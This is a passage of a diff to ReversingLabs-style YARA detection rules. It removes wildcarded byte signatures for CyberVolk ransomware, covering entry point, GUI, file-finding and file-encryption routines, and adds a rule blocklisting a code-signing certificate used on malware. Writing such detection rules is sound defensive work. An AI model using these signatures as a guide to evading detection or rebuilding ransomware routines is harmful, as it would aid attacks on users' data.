-            68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-            FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 C0 74 ?? 8D 45 ?? 8D
-            8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 53 8F 45 ?? E8 ?? ?? ?? ?? 39 44 24 ?? 74 ?? 89 44
-            24 ?? 83 EC ?? 2B C3 58 74 ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 59 89 44 24 ?? 83 EC ?? 2B
-            C3 58 59 74 ?? 68 ?? ?? ?? ?? 50 E8
-        }
-		$main_8 = {
-            68 ?? ?? ?? ?? F3 AB 66 AB AA 8D 44 24 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ??
-            ?? 8D 4C 24 ?? 6A ?? 51 FF D6 83 C4 ?? 85 C0 74 ?? 8D 54 24 ?? 6A ?? 52 FF D6 83 C4
-            ?? C6 00 ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F
-            5E 85 C0 74 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 54 24 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? 50 E8
-        }
-		$entrypoint_all = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ??
-            ?? 83 EC ?? 53 56 57 89 65 ?? 33 DB 89 5D ?? 6A ?? FF 15 ?? ?? ?? ?? 59 83 0D ?? ??
-            ?? ?? ?? 83 0D ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 08 FF 15 ?? ??
-            ?? ?? 8B 0D ?? ?? ?? ?? 89 08 A1 ?? ?? ?? ?? 8B 00 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 39
-            1D ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 35 ?? ?? ??
-            ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $entrypoint_all at pe.entry_point ) and ( $main_1 or $main_2 or ( $main_3 and $start_service_3 ) or $main_4 or $main_5 or ( $main_6 and ( $set_reg_key_6 or $download_tor_6 ) ) or $main_7 or $main_8 )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PK Partnership, OOO" and pe.signatures [ i ] . serial == "0f:c4:d9:17:8b:8d:f2:c1:9e:26:9a:c6:f4:3d:d7:08" and 1466553600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cybervolk : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E01407871E2146C9Baab1Ae7Ab8Ab172 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CyberVolk ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4d8bf096-d5c9-5a77-99e6-2c66e480da36"
-		date = "2024-11-27"
-		modified = "2024-11-27"
+		id = "229772ae-68a2-566b-bf61-988cb41d7d8f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.CyberVolk.yara#L1-L293"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12836-L12854"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "59ed7c4f576fa7cd4cceb724d14f258598c140e434ed309fe2e599c3aaa667d9"
+		logic_hash = "1801e7f15bd5f916fc08d263a845d296d334ca9de1040008f619719c1b5c0a3b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CyberVolk"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$manage_gui_p1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 57 50
-            6A ?? 6A ?? 6A ?? 6A ?? FF D6 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? 83 F8 ?? 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? FF
-            D6 6A ?? 8B F8 FF D6 8B 75 ?? 99 2B C2 6A ?? D1 F8 68 ?? ?? ?? ?? 2D ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 50 8B C7 99 2B C2 D1 F8 2D ?? ?? ?? ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 6A
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5 5D C2 ?? ??
-            80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
-            F0 83 C4 ?? BF ?? ?? ?? ?? 85 F6 74 ?? 56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 56 E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 4F 50 FF 75 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B F8 57
-            89 7C 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B 35 ?? ?? ?? ?? 50 89 44 24 ?? FF D6 89
-            44 24 ?? 8D 44 24 ?? 50 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? FF 74 24 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
-            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ??
-            ?? ?? ?? 50 57 FF D6 8B 74 24 ?? B8 ?? ?? ?? ?? F7 EE B8 ?? ?? ?? ?? 03 D6 C1 FA ??
-            8B FA C1 EF ?? 03 FA F7 EE 03 D6 C1 FA ?? 8B CA C1 E9 ?? 03 CA 8B D1 C1 E2 ?? 2B D1
-        }
-		$manage_gui_p2 = {
-            C1 E2 ?? 8B CE B8 ?? ?? ?? ?? 2B CA 51 69 CF ?? ?? ?? ?? 2B F1 F7 EE 03 D6 C1 FA ??
-            8B C2 C1 E8 ?? 03 C2 50 57 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 44 24 ?? 6A ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15 ?? ?? ??
-            ?? FF 74 24 ?? 8B 74 24 ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50
-            FF 75 ?? FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
-            F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? 8D 84 24 ?? ?? ?? ?? 57 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 83 C4 ?? 8D 51 ?? 0F 1F 40 ?? 8A 01 41 84
-            C0 75 ?? 56 2B CA 8D 84 24 ?? ?? ?? ?? 51 6A ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? 33 C0 5F 5E 8B E5 5D C2 ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 75
-            ?? FF D7 8B 35 ?? ?? ?? ?? 50 FF D6 8B 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 FF D7 50 FF D6
-            8B 75 ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 8D 44 24
-            ?? 50 56 FF 15 ?? ?? ?? ?? 50 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B 3D ?? ??
-            ?? ?? 50 89 44 24 ?? FF D7 8B F0 8D 44 24 ?? 50 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 6A ?? 6A ?? FF 74 24 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF
-            74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 74
-            24 ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 74 24 ?? FF D7 6A
-            ?? 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 56 8B 74 24
-        }
-		$manage_gui_p3 = {
-            56 FF D7 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 33 C0 5F
-            5E 8B E5 5D C2 ?? ?? 0F B7 45 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??
-            83 E8 ?? 0F 84 ?? ?? ?? ?? 2D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 7D ?? 6A ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 6A ?? 8D 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 50 0F 57 C0 C6 44 24 ?? ?? 68 ?? ?? ?? ?? 57 0F 29 44 24
-            ?? 0F 29 44 24 ?? FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA
-            83 F9 ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5
-            5D C2 ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 50
-            6A ?? 6A ?? 6A ?? 6A ?? FF D6 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 56 6A ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ??
-            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 8B E5 5D C2 ?? ?? 6A ?? FF 75 ?? FF 15 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 8B E5 5D C2 ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0
-            56 FF 15 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 00 0F 10 05 ?? ?? ?? ?? 0F 11 40 ??
-            F3 0F 7E 05 ?? ?? ?? ?? 66 0F D6 40 ?? 66 8B 0D ?? ?? ?? ?? 66 89 48 ?? 8A 0D ?? ??
-            ?? ?? 88 48 ?? EB ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ??
-            8B F0 56 FF 15 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 00 0F 10 05 ?? ?? ?? ?? 0F 11
-            40 ?? 66 8B 0D ?? ?? ?? ?? 66 89 48 ?? 8A 0D ?? ?? ?? ?? 88 48 ?? 56 FF 15 ?? ?? ??
-            ?? 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 33 C0 5F 5E 8B E5 5D C2 ?? ?? 3D ?? ?? ?? ?? 75 ?? 81 7D
-        }
-		$find_files_v1_p1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 8B FA 8B D9 89 5D ?? 66 83 FF ?? 75
-            ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-            E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B CB 89 45 ?? 83 C4 ?? 66 A1 ?? ?? ?? ?? 66 89 45 ??
-            8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 81 F9 ?? ?? ?? ?? 0F 87 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 0F B7 0B 0F B7 95 ?? ??
-            ?? ?? 8B D9 8B F2 8D 41 ?? 0F B7 C0 8D 4A ?? 89 45 ?? 66 83 F9 ?? 8D 46 ?? 0F B7 D0
-            8B C6 8B 35 ?? ?? ?? ?? 0F 47 D0 66 83 7D ?? ?? 8D 43 ?? 0F B7 C8 8B C3 0F 47 C8 66
-            3B D1 0F 85 ?? ?? ?? ?? 66 83 7D ?? ?? 8D 43 ?? 0F B7 C8 8B C3 8B 5D ?? 0F 47 C8 0F
-            B7 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 66 89 0B 68 ?? ?? ?? ?? 50 FF
-            D6 8D 8D ?? ?? ?? ?? 83 C4 ?? 8D 51 ?? 0F 1F 80 ?? ?? ?? ?? 66 8B 01 83 C1 ?? 66 85
-            C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? D1 F9 51 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ??
-            8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? A8
-            ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 5D ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D6 83
-            C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 83
-            FE ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 0F 1F 80 ?? ?? ?? ?? 66 8B 01 83
-            C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 81 F9 ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ??
-            ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66
-            3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F
-            84 ?? ?? ?? ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66
-        }
-		$find_files_v1_p2 = {
-            8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 53 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 53
-            66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 66 83
-            FF ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? EB ?? 66 83 FF ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 66 89 85 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 66 83 FF ?? 75 ?? 8D 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 33 F6 66 66 0F 1F 84 00
-            ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? 74 ?? 57 6A ?? 6A ?? 51 E8 ?? ??
-            ?? ?? 46 83 C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 57 E8 ?? ?? ?? ?? 8B 75 ?? 83 C4 ?? 56 FF
-            15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_v1_p1 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 51 53 81 EC ?? ?? ?? ?? 53 56 57 89 65
-            ?? 8B F9 89 7D ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 85 ?? ?? ?? ?? 0F 11 45 ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 0F 13 45 ?? 66 0F 13
-            45 ?? 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 57 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ??
-            8B F7 8D 4E ?? 0F 1F 00 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 83 C6 ?? 89 75
-            ?? C7 45 ?? ?? ?? ?? ?? 33 C9 8B C6 BA ?? ?? ?? ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 33 C9 66 89 08 57 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
-            ?? ?? ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 8B 75 ?? 56 E8 ?? ??
-            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 56 8D 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B CA
-            89 4D ?? 85 C9 0F 8C ?? ?? ?? ?? 7F ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8B F8 89 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? BA ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ??
-            6A ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 57 FF 75 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8B C8 89 4D ?? 99 8B F0 89 75 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 81
-        }
-		$encrypt_files_v1_p2 = {
-            F9 ?? ?? ?? ?? 7E ?? B9 ?? ?? ?? ?? 8B F7 8D BD ?? ?? ?? ?? F3 A5 8D 45 ?? 50 8D 45
-            ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? FF 75 ?? 8B 7D ?? 57 8B 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 85 ??
-            ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 75 ?? 56 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ??
-            83 C4 ?? EB ?? 51 57 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 45
-            ?? 50 8D 85 ?? ?? ?? ?? 50 56 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
-            75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 03 C6 89 45 ??
-            8B 4D ?? 13 4D ?? 89 4D ?? 3B 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 45 ?? 0F 82 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? FF 75 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 56 51 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 6A ?? 57 E8 ?? ?? ?? ?? 6A ?? 8B D7 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 89
-            45 ?? C7 45 ?? ?? ?? ?? ?? 8D 70 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 56 8B D0 8B
-            7D ?? 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 56 8B 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            85 FF 74 ?? 8B CF E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 75 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 83 E0 ?? 50 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ??
-            ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D 8B E3 5B C3
-        }
-		$find_files_v2_p1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8B C2 8B D9 89 45 ?? 89 5D ?? 56 57 66 83
-            F8 ?? 75 ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            6A ?? 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B CB 89 45 ?? 83 C4 ?? 66 A1 ?? ?? ?? ?? 66
-            89 45 ?? 8D 51 ?? 66 0F 1F 44 00 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 81
-            F9 ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 0F B7 85 ?? ?? ?? ?? 8B F0 8D 48 ?? 8D 46 ?? 66 83 F9 ?? 0F B7 D0 8B CE 8B C6 0F
-            47 D0 0F B7 03 0F B7 FA 8B D0 83 C0 ?? 0F B7 D8 66 83 F8 ?? 8B C6 76 ?? 0F B7 F0 83
-            FB ?? 8D 42 ?? 0F B7 C8 8B C2 0F 47 C8 66 3B F9 8B 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 8B 5D ?? 83 C4 ?? 0F B7
-            03 8B F0 8B C8 83 C1 ?? 66 83 F9 ?? 8D 46 ?? 0F B7 D0 8B C6 0F 47 D0 0F B7 85 ?? ??
-            ?? ?? 8B C8 66 89 13 8D 50 ?? 8D 41 ?? 66 83 FA ?? 0F B7 F0 8B C1 8B CB 0F 47 F0 66
-            89 B5 ?? ?? ?? ?? 8D 51 ?? 0F 1F 00 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 83
-            F9 ?? 76 ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ??
-            EB ?? 8B 5D ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 83 C4 ?? 8D 85 ?? ?? ??
